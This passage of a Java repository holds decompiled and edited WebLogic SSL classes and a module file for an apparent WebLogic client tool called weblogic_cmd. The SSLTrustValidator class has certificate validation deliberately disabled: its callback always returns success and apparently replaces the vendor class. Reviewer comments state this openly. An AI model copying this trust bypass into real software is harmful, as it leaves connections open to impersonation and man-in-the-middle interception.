    final Loggable entry = SecurityLogger.logCertificateChainConstraintsConversionFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 certificate with an unrecognised critical
 * extension.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * <p>NOTE(review): {@code var1} is concatenated into the debug message
 * as-is. If it is taken from the peer's certificate, line breaks and control
 * characters should be neutralised before logging - confirm against callers.
 *
 * @param var0 socket whose peer presented the chain
 * @param var1 identifier of the unrecognised extension
 */
public static void logCertificateChainUnrecognizedExtensionFailure(SSLSocket var0, String var1) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 certificate with unrecognized critical extension: " + var1);
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainUnrecognizedExtensionFailureLoggable(peer, var1);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 certificate whose key usage does not
 * permit the use required by the key agreement algorithm.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainAlgKeyUsageFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 certificate which key usage constraints indicate" + " its key cannot be used in quality required by the key agreement algorithm");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainAlgKeyUsageFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports that key usage constraints could not be checked because the key
 * agreement algorithm could not be determined.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the certificate
 */
public static void logCertificateChainCheckKeyUsageFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "Cannot check key usage constraints of certificate recieved from " + peer + " because of the failure to determine the key agreement algorithm");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainCheckKeyUsageFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 CA certificate whose key usage does not
 * permit signing certificates.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainCertSignKeyUsageFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which key usage constraints indicate" + " its key cannot be used to sign certificates");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainCertSignKeyUsageFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
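/**
 * Reports a certificate whose policy identifier is not in the allowed list.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * <p>Change from the decompiled original: the unused {@code getPeerName}
 * call was removed. Its result was never logged, and computing it triggers a
 * host name lookup for the peer address.
 *
 * <p>NOTE(review): {@code var1} is concatenated into the debug message
 * as-is. If it is taken from the peer's certificate, line breaks and control
 * characters should be neutralised before logging - confirm against callers.
 *
 * @param var0 socket whose peer presented the certificate
 * @param var1 the rejected policy identifier
 */
public static void logCertificatePolicyIdDoesntExistIntheList(SSLSocket var0, String var1) {
    debug(2, "Certificate Policies Extension Processing Failed,PolicyId: " + var1 + " doesn't Exist in the allowed list");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificatePolicyIdDoesntExistIntheListLoggable(var1);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}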
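/**
 * Reports a certificate whose policy qualifier identifier is not the CPS
 * qualifier identifier.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * <p>Change from the decompiled original: the unused {@code getPeerName}
 * call was removed. Its result was never logged, and computing it triggers a
 * host name lookup for the peer address.
 *
 * <p>NOTE(review): {@code var1} is concatenated into the debug message
 * as-is. If it is taken from the peer's certificate, line breaks and control
 * characters should be neutralised before logging - confirm against callers.
 *
 * @param var0 socket whose peer presented the certificate
 * @param var1 the policy qualifier identifier found in the certificate
 */
public static void logPolicyQualifierIdNotCPS(SSLSocket var0, String var1) {
    debug(2, "PolicyQualifier Id Found in the Certificate" + var1 + " doesn't match with CPS Qualifier Id");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logPolicyQualifierIdNotCPSLoggable(var1);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}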
/**
 * Builds a printable name for the socket's peer.
 *
 * <p>The result is {@code "<host name> - <host address>"}. If the host name
 * lookup is refused with a {@code SecurityException} only the address is
 * used, and if that is {@code null} the address object's string form is
 * used. A null socket or a socket without an address yields
 * {@code "unknown"}.
 *
 * <p>NOTE(review): {@code getHostName()} may perform a reverse name lookup,
 * so the name portion can be controlled by whoever controls that record.
 * Treat the returned string as untrusted when it is written to logs.
 *
 * @param var0 socket to describe; may be null
 * @return the peer description, never null for a null socket
 */
public static String getPeerName(SSLSocket var0) {
    if (var0 == null) {
        return "unknown";
    }
    final InetAddress address = var0.getInetAddress();
    if (address == null) {
        return "unknown";
    }
    String description;
    try {
        description = address.getHostName() + " - " + address.getHostAddress();
    } catch (SecurityException lookupDenied) {
        description = address.getHostAddress();
    }
    return description != null ? description : address.toString();
}
/**
 * Logs an alert received from the peer and stores the message on the socket's session.
 *
 * <p>Nothing happens unless {@code logSSLRejections()} returns true. Alert codes 0 and 90 are
 * never logged (in TLS these codes are close_notify and user_canceled). Codes with a dedicated
 * {@code SecurityLogger} message use it; every other code is logged through the generic
 * message, which carries the numeric code.
 *
 * @param var0 socket the alert arrived on; used for the peer name and dereferenced for its
 *             session
 * @param var1 numeric alert code
 */
public static void logAlertReceivedFromPeer(SSLSocket var0, int var1) {
    if (!logSSLRejections() || var1 == 0 || var1 == 90) {
        return;
    }
    final String peer = getPeerName(var0);
    final Loggable entry;
    switch (var1) {
        case 10:
            entry = SecurityLogger.logUnexpectedMessageAlertReceivedFromPeerLoggable(peer);
            break;
        case 20:
            entry = SecurityLogger.logBadRecordMacAlertReceivedFromPeerLoggable(peer);
            break;
        case 21:
            entry = SecurityLogger.logDecryptionFailedAlertReceivedFromPeerLoggable(peer);
            break;
        case 22:
            entry = SecurityLogger.logRecordOverFlowAlertReceivedFromPeerLoggable(peer);
            break;
        case 30:
            entry = SecurityLogger.logDecompressionFailureAlertReceivedFromPeerLoggable(peer);
            break;
        case 40:
            entry = SecurityLogger.logHandshakeFailureAlertReceivedFromPeerLoggable(peer);
            break;
        case 41:
            entry = SecurityLogger.logNoCertificateAlertReceivedFromPeerLoggable(peer);
            break;
        case 42:
            entry = SecurityLogger.logBadCertificateAlertReceivedFromPeerLoggable(peer);
            break;
        case 43:
            entry = SecurityLogger.logUnsupportedCertificateAlertReceivedFromPeerLoggable(peer);
            break;
        case 44:
            entry = SecurityLogger.logCertificateRevokedAlertReceivedFromPeerLoggable(peer);
            break;
        case 45:
            entry = SecurityLogger.logCertificateExpiredAlertReceivedFromPeerLoggable(peer);
            break;
        case 46:
            entry = SecurityLogger.logCertificateUnknownAlertReceivedFromPeerLoggable(peer);
            break;
        case 47:
            entry = SecurityLogger.logIllegalParameterAlertReceivedFromPeerLoggable(peer);
            break;
        case 48:
            entry = SecurityLogger.logUnknownCAAlertReceivedFromPeerLoggable(peer);
            break;
        case 49:
            entry = SecurityLogger.logAccessDeniedAlertReceivedFromPeerLoggable(peer);
            break;
        case 50:
            entry = SecurityLogger.logDecodeErrorAlertReceivedFromPeerLoggable(peer);
            break;
        case 51:
            entry = SecurityLogger.logDecryptErrorAlertReceivedFromPeerLoggable(peer);
            break;
        case 60:
            entry = SecurityLogger.logExportRestrictionAlertReceivedFromPeerLoggable(peer);
            break;
        case 70:
            entry = SecurityLogger.logProtocolVersionAlertReceivedFromPeerLoggable(peer);
            break;
        case 71:
            entry = SecurityLogger.logInsufficientSecurityAlertReceivedFromPeerLoggable(peer);
            break;
        case 80:
            entry = SecurityLogger.logInternalErrorAlertReceivedFromPeerLoggable(peer);
            break;
        case 100:
            entry = SecurityLogger.logNoRenegotiationAlertReceivedFromPeerLoggable(peer);
            break;
        default:
            // Any code without a dedicated message is reported with its number.
            entry = SecurityLogger.logAlertReceivedFromPeerLoggable(peer, Integer.toString(var1));
            break;
    }
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Translates a server's key store configuration into trust key store properties.
 *
 * <p>The value of {@code getKeyStores()} selects which entries are produced:
 * <ul>
 *   <li>{@code DemoIdentityAndDemoTrust}: {@code TrustKeyStore=DemoTrust} plus the Java
 *       standard trust pass phrase</li>
 *   <li>{@code CustomIdentityAndJavaStandardTrust}: {@code TrustKeyStore=JavaStandardTrust}
 *       plus the Java standard trust pass phrase</li>
 *   <li>{@code CustomIdentityAndCustomTrust}: {@code TrustKeyStore=CustomTrust} plus the custom
 *       trust file name, type and pass phrase</li>
 *   <li>{@code CustomIdentityAndCommandLineTrust}: no entries</li>
 * </ul>
 * Entries whose value is null are omitted.
 *
 * <p>The returned object holds key store pass phrases in clear text, so it should be handled
 * as a secret and kept out of logs and dumps.
 *
 * @param var0 server configuration to read
 * @return the trust properties for the configured mode
 * @throws RuntimeException if the key store mode is any other value, including null
 */
public static Properties getSSLTrustProperties(ServerMBean var0) {
    final Properties trust = new Properties();
    final String mode = var0.getKeyStores();

    if ("DemoIdentityAndDemoTrust".equals(mode)) {
        add(trust, "TrustKeyStore", "DemoTrust");
        add(trust, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
        return trust;
    }
    if ("CustomIdentityAndJavaStandardTrust".equals(mode)) {
        add(trust, "TrustKeyStore", "JavaStandardTrust");
        add(trust, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
        return trust;
    }
    if ("CustomIdentityAndCustomTrust".equals(mode)) {
        add(trust, "TrustKeyStore", "CustomTrust");
        add(trust, "CustomTrustKeyStoreFileName", var0.getCustomTrustKeyStoreFileName());
        add(trust, "CustomTrustKeyStoreType", var0.getCustomTrustKeyStoreType());
        add(trust, "CustomTrustKeyStorePassPhrase", var0.getCustomTrustKeyStorePassPhrase());
        return trust;
    }
    if ("CustomIdentityAndCommandLineTrust".equals(mode)) {
        // Nothing is added for this mode; the properties stay empty.
        return trust;
    }
    throw new RuntimeException(SecurityLogger.getAssertionIllegalKeystoresValue(mode));
}
/**
 * Tells whether this JVM is running as a client.
 *
 * @return true exactly when {@code Kernel.isServer()} is false
 */
static boolean isFatClient() {
    final boolean server = Kernel.isServer();
    return !server;
}
/**
 * Forwards to {@code SecurityLogger.logSSLUsingNullCipher()}.
 *
 * <p>NOTE(review): judging by the name, this reports that a null (non-encrypting) cipher is
 * in use; confirm against the logger's message catalog.
 */
public static void logSSLUsingNullCipher() {
    SecurityLogger.logSSLUsingNullCipher();
}
/**
 * Stores a property only when a value is present, so absent settings leave no entry.
 *
 * @param var0 properties to update
 * @param var1 property key
 * @param var2 property value; null means "skip this key"
 */
private static void add(Properties var0, String var1, String var2) {
    if (var2 == null) {
        return;
    }
    var0.setProperty(var1, var2);
}
}
================================================
FILE: src/weblogic/security/utils/SSLTrustValidator.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.security.SSL.CertPathTrustManager;
import weblogic.security.SSL.TrustManager;
import weblogic.security.SecurityLogger;
import javax.net.ssl.SSLSocket;
import java.net.InetAddress;
import java.security.cert.X509Certificate;
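/**
 * Trust-validation callback holder, recreated from a decompiled class and then edited.
 *
 * <p>In this copy {@link #validationCallback} ignores all of its arguments and returns 0. In
 * the disabled original logic, 0 is the value left when no error bit is set, so every peer is
 * reported as valid whatever certificate chain it presents, or with none at all. The trust
 * manager, root CA fingerprints, peer-certificate requirement and override flag can still be
 * set, but nothing in this class consults them during validation. A connection made through
 * this class is therefore not authenticated.
 *
 * <p>NOTE(review): the class sits in package {@code weblogic.security.utils}, presumably so
 * that it is loaded in place of the vendor class of the same name; confirm against the build
 * and class path order.
 *
 * <p>Error bits used by the disabled logic and by {@link #logValidationError}:
 * 1 = chain invalid, 2 = certificate expired, 4 = chain incomplete, 16 = chain untrusted,
 * 32 = rejected by the custom trust manager, 64 = override not allowed.
 */
public class SSLTrustValidator implements SSLTruster {
    // Read by isPeerCertsRequired(); the validation callback no longer consults it.
    private boolean peerCertsRequired = false;
    // Written by setAllowOverride(); not read by any active code in this class.
    private boolean overrideAllowed = true;
    // Used only to report its class name in log messages; its callback is never invoked here.
    private TrustManager trustManager = null;
    // Written by setRootCAFingerPrints(); not read by any active code in this class.
    private byte[][] rootCAFingerPrints = null;
    // Proxy mapping used to annotate peer names in log output.
    private String proxyHostName = null;
    private String urlHostName = null;

    /** Creates a validator; on a server it installs a {@code CertPathTrustManager}. */
    public SSLTrustValidator() {
        if (Kernel.isServer()) {
            this.setTrustManager(new CertPathTrustManager());
        }
    }

    /** @param var1 trust manager to remember; may be null */
    public void setTrustManager(TrustManager var1) {
        this.trustManager = var1;
    }

    /** @param var1 root CA fingerprints to remember; may be null */
    public void setRootCAFingerPrints(byte[][] var1) {
        this.rootCAFingerPrints = var1;
    }

    /** @return the flag last passed to {@link #setPeerCertsRequired}, false by default */
    public boolean isPeerCertsRequired() {
        return this.peerCertsRequired;
    }

    /** @param var1 whether the peer must supply certificates (stored only) */
    public void setPeerCertsRequired(boolean var1) {
        this.peerCertsRequired = var1;
    }

    /** @param var1 whether the validation result may be overridden (stored only) */
    public void setAllowOverride(boolean var1) {
        this.overrideAllowed = var1;
    }

    /**
     * Remembers a proxy host and the URL host reached through it, for log annotation.
     *
     * @param var1 proxy host name or address
     * @param var2 host name from the URL
     */
    public void setProxyMapping(String var1, String var2) {
        this.urlHostName = var2;
        this.proxyHostName = var1;
    }

    /**
     * Validation hook; in this copy it accepts every peer.
     *
     * <p>All arguments are ignored and 0 is returned. The original logic is kept below as a
     * comment so that the disabled checks stay visible: the legacy root CA fingerprint match,
     * the missing-peer-certificate handling, the custom trust manager callback, the error
     * logging and the no-override bit.
     *
     * @param var1 peer certificate chain (ignored)
     * @param var2 error bit mask from the built-in validation (ignored)
     * @param var3 socket being validated (ignored)
     * @param var4 certificates the disabled logic handed to {@code TrustManagerEnvironment}
     *             (ignored)
     * @return always 0
     */
    public int validationCallback(X509Certificate[] var1, int var2, SSLSocket var3, X509Certificate[] var4) {
        // boolean var5 = SSLSetup.isDebugEnabled();
        // int var6 = var2;
        // if(var5) {
        //     SSLSetup.info("validationCallback: validateErr = " + var2);
        //     if(var1 != null) {
        //         for(int var7 = 0; var7 < var1.length; ++var7) {
        //             SSLSetup.info(" cert[" + var7 + "] = " + var1[var7]);
        //         }
        //     }
        // }
        //
        // if((var2 & 16) != 0 && this.rootCAFingerPrints != null && var1 != null && var1.length > 0) {
        //     try {
        //         byte[] var15 = SSLCertUtility.getFingerprint(var1[var1.length - 1]);
        //
        //         for(int var8 = 0; var8 < this.rootCAFingerPrints.length; ++var8) {
        //             if(Arrays.equals(var15, this.rootCAFingerPrints[var8])) {
        //                 var6 &= -21;
        //                 if(var5) {
        //                     SSLSetup.info("Untrusted cert now trusted by legacy check");
        //                 }
        //                 break;
        //             }
        //         }
        //     } catch (CertificateEncodingException var14) {
        //         SSLSetup.debug(1, var14, "Error while getting encoded certificate during trust validation");
        //     }
        // }
        //
        // if(var1 == null || var1.length == 0) {
        //     if(this.peerCertsRequired) {
        //         if(var5) {
        //             SSLSetup.info("Required peer certificates not supplied by peer");
        //         }
        //
        //         var6 |= 4;
        //     } else {
        //         if(var5) {
        //             SSLSetup.info("Peer certificates are not required and were not supplied by peer");
        //         }
        //
        //         var6 = 0;
        //     }
        // }
        //
        // if(this.trustManager != null) {
        //     TrustManagerEnvironment.push(var4, var3);
        //     boolean var16 = false;
        //
        //     try {
        //         var16 = this.trustManager.certificateCallback(var1, var6);
        //     } finally {
        //         TrustManagerEnvironment.pop();
        //     }
        //
        //     if(!var16 && var6 == 0) {
        //         var6 |= 32;
        //     }
        //
        //     if(var5) {
        //         SSLSetup.info("weblogic user specified trustmanager validation status " + var6);
        //     }
        // }
        //
        // if(var6 != 0) {
        //     this.logValidationError(var6, var3);
        //     if(!this.overrideAllowed) {
        //         if(var5) {
        //             SSLSetup.info("User defined JSSE trustmanagers not allowed to override");
        //         }
        //
        //         var6 |= 64;
        //     }
        // }
        //
        // if(var5) {
        //     SSLSetup.info("SSLTrustValidator returns: " + var6);
        // }
        return 0;
    }

    /** @return the class name of the configured trust manager, or null when none is set */
    private String getTrustManagerClassName() {
        return this.trustManager != null ? this.trustManager.getClass().getName() : null;
    }

    /**
     * Builds the peer name for log messages, appending {@code " --> <url host>"} when the
     * socket is connected to the configured proxy.
     *
     * @param var1 socket to describe; may be null, in which case the plain
     *             {@code SSLSetup.getPeerName} result is returned
     * @return display name for the peer
     */
    private String getPeerName(SSLSocket var1) {
        String name = SSLSetup.getPeerName(var1);
        // A null socket is tolerated by SSLSetup.getPeerName and by logValidationError, so the
        // proxy annotation must not dereference it either.
        if (var1 != null && this.proxyHostName != null && this.urlHostName != null) {
            InetAddress remote = var1.getInetAddress();
            if (remote != null
                    && (this.proxyHostName.equals(remote.getHostName())
                            || this.proxyHostName.equals(remote.getHostAddress()))) {
                name = name + " --> " + this.urlHostName;
            }
        }
        return name;
    }

    /**
     * Reports each error bit set in a validation result.
     *
     * <p>When {@code SSLSetup.logSSLRejections()} is true, one {@code SecurityLogger} entry is
     * logged per set bit (1, 2, 4, 16, 32) and, if a socket is given, the messages are joined
     * with {@code ", "} and stored as the session's failure details. When debug is enabled the
     * raw value and a line per set bit are written as well. No active code in this class
     * calls this method; its only caller is inside the disabled validation logic.
     *
     * @param var1 validation error bit mask
     * @param var2 socket being validated; may be null
     */
    private void logValidationError(int var1, SSLSocket var2) {
        if (SSLSetup.logSSLRejections()) {
            String peer = this.getPeerName(var2);
            // At most one entry per reported bit: 1, 2, 4, 16 and 32.
            Loggable[] entries = new Loggable[5];
            int count = 0;
            if ((var1 & 1) != 0) {
                entries[count++] = SecurityLogger.logHandshakeCertInvalidErrorLoggable(peer);
            }
            if ((var1 & 2) != 0) {
                entries[count++] = SecurityLogger.logHandshakeCertExpiredErrorLoggable(peer);
            }
            if ((var1 & 4) != 0) {
                entries[count++] = SSLSetup.isFatClient()
                        ? SecurityLogger.logFatClientHandshakeCertIncompleteErrorLoggable(peer)
                        : SecurityLogger.logHandshakeCertIncompleteErrorLoggable(peer);
            }
            if ((var1 & 16) != 0) {
                entries[count++] = SSLSetup.isFatClient()
                        ? SecurityLogger.logFatClientHandshakeCertUntrustedErrorLoggable(peer)
                        : SecurityLogger.logHandshakeCertUntrustedErrorLoggable(peer);
            }
            if ((var1 & 32) != 0) {
                entries[count++] = SSLSetup.isFatClient()
                        ? SecurityLogger.logFatClientHandshakeCertValidationErrorLoggable(peer, this.getTrustManagerClassName())
                        : SecurityLogger.logHandshakeCertValidationErrorLoggable(peer, this.getTrustManagerClassName());
            }
            if (count > 0) {
                // Failure details are collected only when there is a session to attach them to.
                StringBuilder details = var2 != null ? new StringBuilder() : null;
                for (int i = 0; i < count; ++i) {
                    entries[i].log();
                    if (details != null) {
                        if (i > 0) {
                            details.append(", ");
                        }
                        details.append(entries[i].getMessage());
                    }
                }
                if (details != null) {
                    SSLSetup.setFailureDetails(var2.getSession(), details.toString());
                }
            }
        }
        if (SSLSetup.isDebugEnabled()) {
            SSLSetup.info("Validation error = " + var1);
            if ((var1 & 1) != 0) {
                SSLSetup.info("Certificate chain is invalid");
            }
            if ((var1 & 2) != 0) {
                SSLSetup.info("Expired certificate");
            }
            if ((var1 & 4) != 0) {
                SSLSetup.info("Certificate chain is incomplete");
            }
            if ((var1 & 16) != 0) {
                SSLSetup.info("Certificate chain is untrusted");
            }
            if ((var1 & 32) != 0) {
                SSLSetup.info("Certificate chain was not validated by the custom trust manager even though built-in SSL validated it.");
            }
        }
    }
}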
================================================
FILE: src/weblogic/socket/ChannelSSLSocketFactory.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.socket;
import java.io.IOException;
import java.net.InetAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.UnknownHostException;
import java.security.AccessController;
import java.security.SecureRandom;
import com.supeream.ssl.SocketFactory;
import com.supeream.ssl.TrustManagerImpl;
import weblogic.kernel.KernelStatus;
import weblogic.protocol.ServerChannel;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.SSLSocketFactory;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.acl.internal.Security;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
import weblogic.security.utils.SSLContextManager;
import weblogic.security.utils.SSLSetup;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
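/**
 * SSL socket factory bound to a {@code ServerChannel}, recreated from a decompiled class.
 *
 * <p>The underlying JSSE factory comes from an {@code SSLClientInfo} that is resolved lazily
 * on first use (see {@link #getSocketFactory()}). Local binding and proxying are taken from
 * the channel, so the overloads that accept an explicit local address are unsupported.
 */
public final class ChannelSSLSocketFactory extends SSLSocketFactory {
    private static final AuthenticatedSubject kernelId =
            (AuthenticatedSubject) AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
    private ServerChannel channel;
    // Resolved on first use or by initializeFromThread(); null until then.
    private SSLClientInfo sslInfo;

    /**
     * @param var1 channel that determines binding, proxy and timeout settings
     * @throws IllegalArgumentException if the channel is null
     */
    public ChannelSSLSocketFactory(ServerChannel var1) {
        super((javax.net.ssl.SSLSocketFactory) null);
        if (var1 == null) {
            throw new IllegalArgumentException("Channel must not be null");
        }
        this.channel = var1;
    }

    /** Resolves the host name and delegates to {@link #createSocket(InetAddress, int)}. */
    public Socket createSocket(String var1, int var2) throws IOException, UnknownHostException {
        return this.createSocket(InetAddress.getByName(var1), var2);
    }

    /**
     * Resolves the SSL client info now instead of on first use.
     *
     * @return this factory
     */
    public SSLSocketFactory initializeFromThread() throws IOException {
        this.sslInfo = this.createSSLClientInfo();
        return this;
    }

    /** Unsupported: the local binding comes from the channel. */
    public Socket createSocket(String var1, int var2, InetAddress var3, int var4) {
        throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
    }

    /**
     * Opens an SSL socket to the given address. On a server with outbound enabled on the
     * channel, the socket is bound locally to the channel address (local port 0).
     */
    public Socket createSocket(InetAddress var1, int var2) throws IOException {
        javax.net.ssl.SSLSocketFactory delegate = this.getSocketFactory();
        if (KernelStatus.isServer() && this.channel.isOutboundEnabled()) {
            return delegate.createSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0);
        }
        return delegate.createSocket(var1, var2);
    }

    /** Unsupported: the local binding comes from the channel. */
    public Socket createSocket(InetAddress var1, int var2, InetAddress var3, int var4) {
        throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
    }

    /**
     * Opens an SSL socket with a connect timeout.
     *
     * <p>A positive {@code var3} is used as the timeout; otherwise the channel's connect
     * timeout multiplied by 1000 is used (presumably seconds to milliseconds, confirm). A
     * resulting timeout of 0 falls back to {@link #createSocket(InetAddress, int)}. Otherwise
     * a plain socket is opened through the socket muxer, via the channel's proxy when one is
     * configured, and SSL is layered over it with auto-close enabled.
     *
     * @param var1 remote address
     * @param var2 remote port
     * @param var3 requested timeout, or a value of 0 or less to use the channel's setting
     */
    public Socket createSocket(InetAddress var1, int var2, int var3) throws IOException {
        // Disabled alternative kept from the original file. It built a separate "SSL" context
        // around com.supeream.ssl.TrustManagerImpl (behaviour not visible in this file) and
        // refers to names (host, port) that are not defined in this method.
        // try {
        //     SSLContext context = SSLContext.getInstance("SSL");
        //     // initialize
        //     context.init(null,
        //             new TrustManager[]{new TrustManagerImpl()},
        //             new SecureRandom());
        //     javax.net.ssl.SSLSocketFactory factory = context.getSocketFactory();
        //     Socket socket = factory.createSocket(host, port);
        //     return socket;
        // }catch (Exception e) {
        //     e.printStackTrace();
        // }
        // return null;
        int timeout = var3 > 0 ? var3 : this.channel.getConnectTimeout() * 1000;
        if (timeout == 0) {
            return this.createSocket(var1, var2);
        }
        Socket plain;
        if (KernelStatus.isServer() && this.channel.isOutboundEnabled()) {
            if (this.channel.getProxyAddress() != null) {
                plain = SocketMuxer.getMuxer().newProxySocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, InetAddress.getByName(this.channel.getProxyAddress()), this.channel.getProxyPort(), timeout);
            } else {
                plain = SocketMuxer.getMuxer().newSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, timeout);
            }
        } else {
            plain = SocketMuxer.getMuxer().newSocket(var1, var2, timeout);
        }
        return this.createSocket(plain, var1.getHostName(), var2, true);
    }

    /**
     * @return the default cipher suites of the underlying factory
     * @throws IllegalStateException (with the {@link IOException} as cause) if the underlying
     *                               factory cannot be obtained
     */
    public String[] getDefaultCipherSuites() {
        try {
            return this.getSocketFactory().getDefaultCipherSuites();
        } catch (IOException var2) {
            throw (RuntimeException) (new IllegalStateException()).initCause(var2);
        }
    }

    /**
     * @return the supported cipher suites of the underlying factory
     * @throws IllegalStateException (with the {@link IOException} as cause) if the underlying
     *                               factory cannot be obtained
     */
    public String[] getSupportedCipherSuites() {
        try {
            return this.getSocketFactory().getSupportedCipherSuites();
        } catch (IOException var2) {
            throw (RuntimeException) (new IllegalStateException()).initCause(var2);
        }
    }

    /** Layers SSL over an existing socket using the underlying factory. */
    public Socket createSocket(Socket var1, String var2, int var3, boolean var4) throws IOException {
        return this.getSocketFactory().createSocket(var1, var2, var3, var4);
    }

    /**
     * Returns the JSSE factory of the SSL client info, resolving the info on first use and
     * setting its NIO flag from the muxer type.
     */
    private javax.net.ssl.SSLSocketFactory getSocketFactory() throws IOException {
        if (this.sslInfo == null) {
            this.sslInfo = this.createSSLClientInfo();
            this.sslInfo.setNio(SocketMuxer.getMuxer().isAsyncMuxer());
        }
        return this.sslInfo.getSSLSocketFactory();
    }

    /** @return the SSL client info resolved so far, or null if none has been resolved */
    public SSLClientInfo getSSLClientInfo() {
        return this.sslInfo;
    }

    /**
     * Chooses between the calling thread's SSL client info and the channel's own.
     *
     * <p>The condition is kept exactly as decompiled because its short-circuit order decides
     * which lookups run. The channel's client info is used when the channel has outbound and
     * outbound private key enabled, or when the code runs on a server as the kernel identity
     * and the thread carries no (or an empty) client info. In every other case the thread's
     * client info is returned, which may be null.
     *
     * @throws IOException wrapping any failure to obtain the channel's client info
     */
    private SSLClientInfo createSSLClientInfo() throws IOException {
        SSLClientInfo threadInfo = Security.getThreadSSLClientInfo();
        if ((!KernelStatus.isServer() || threadInfo != null && !threadInfo.isEmpty() || kernelId != SecurityServiceManager.getCurrentSubject(kernelId)) && (!this.channel.isOutboundEnabled() || !this.channel.isOutboundPrivateKeyEnabled())) {
            return threadInfo;
        }
        try {
            return SSLContextManager.getChannelSSLClientInfo(this.channel, kernelId);
        } catch (Exception var3) {
            throw (IOException) (new IOException(var3.getMessage())).initCause(var3);
        }
    }

    /**
     * Replaces the JSSE factory held by the superclass.
     *
     * <p>With a non-null client info its own factory is used, after its NIO flag is switched
     * on when the muxer is asynchronous and the flag was not set. With null, the factory comes
     * from {@code SSLSetup.getSSLContext(null)}: the NIO variant for an asynchronous muxer,
     * the regular one otherwise. The {@code sslInfo} field is not modified.
     *
     * @param var1 client info to take the factory from; may be null
     * @throws RuntimeException if the context cannot be created; the {@link SocketException}
     *                          is attached as the cause, matching the other methods of this
     *                          class that chain their causes
     */
    public void setSSLClientInfo(SSLClientInfo var1) {
        try {
            if (SocketMuxer.getMuxer().isAsyncMuxer()) {
                if (var1 != null && !var1.isNioSet()) {
                    var1.setNio(true);
                }
                this.jsseFactory = var1 == null ? SSLSetup.getSSLContext(var1).getSSLNioSocketFactory() : var1.getSSLSocketFactory();
            } else {
                this.jsseFactory = var1 == null ? SSLSetup.getSSLContext(var1).getSSLSocketFactory() : var1.getSSLSocketFactory();
            }
        } catch (SocketException var3) {
            SSLSetup.debug(3, var3, "Failed to create context");
            throw new RuntimeException("Failed to update factory: " + var3.getMessage(), var3);
        }
    }
}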
================================================
FILE: weblogic_cmd.iml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!-- IntelliJ IDEA module descriptor: one source root (src) and five libraries declared at
     project level. -->
<module type="JAVA_MODULE" version="4">
  <component name="NewModuleRootManager" inherit-compiler-output="true">
    <exclude-output />
    <content url="file://$MODULE_DIR$">
      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
    </content>
    <orderEntry type="inheritedJdk" />
    <orderEntry type="sourceFolder" forTests="false" />
    <!-- commons-collections 3.1: releases before 3.2.2 place no restriction on deserializing
         InvokerTransformer and the other functor classes, so this jar should stay off the
         class path of any service that deserializes untrusted data. -->
    <orderEntry type="library" name="commons-collections-3.1" level="project" />
    <orderEntry type="library" name="wlfullclient" level="project" />
    <orderEntry type="library" name="commons-cli-1.4" level="project" />
    <orderEntry type="library" name="jsafeFIPS" level="project" />
    <orderEntry type="library" name="wlcipher" level="project" />
  </component>
</module>
